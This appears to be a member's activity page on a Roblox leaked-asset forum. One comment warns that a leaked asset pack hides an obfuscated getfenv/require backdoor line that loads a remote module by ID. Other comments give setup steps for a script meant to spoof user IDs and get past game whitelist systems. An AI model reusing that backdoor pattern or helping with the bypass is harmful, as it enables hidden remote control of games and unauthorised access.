Jump to content
🎉 ATTENTION: Post 10 quality assets for a chance of Platinum. This is limited time.

Kott Mini

Member
  • Joined

  • Last visited

  1. Kott Mini reviewed mathewmunich's review on a file in Military
    Attention. OP should remove this as it contains backdoors in 90% of the scripts with the message “getfenv()[string.reverse("\101\114\105\117\113\101\114")]”(5754612086)”. Backdoor isnt confirmed but to have this line of text hidden away from the main code on almost every script is very suspicious.
    You got the latest strike engine picture but this leak is old, i think its pretty disrespectful to deny that this is old.
  2. if it does not work then change the user id to one of the owners of that system
  3. @kizzythedog I did trial and error came to a solution. Step 1: Put it in serverscriptservice Step 2: Select serverscriptservice and enable loadstring Step 3: Inside the script put your user id in line 37. Hope it worked for you! it did for me tho!
  4. How do i use this? it does not work even though i typed in my creator id. This is supposed to spoof something so i can get through whitelist systems. But there are no instructions and i did what i could to try to make it work including typing in my creator id and placing in workspace, serverscriptservice and placing it under a script. This file can be found: BypassExample.rbxm

© 2023-2025 ForbsLeaks, DarkBlox, AssetWorld. All rights reserved. Unauthorized use of materials is prohibited. Powered by Invision Community
Invision Community Support forums

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.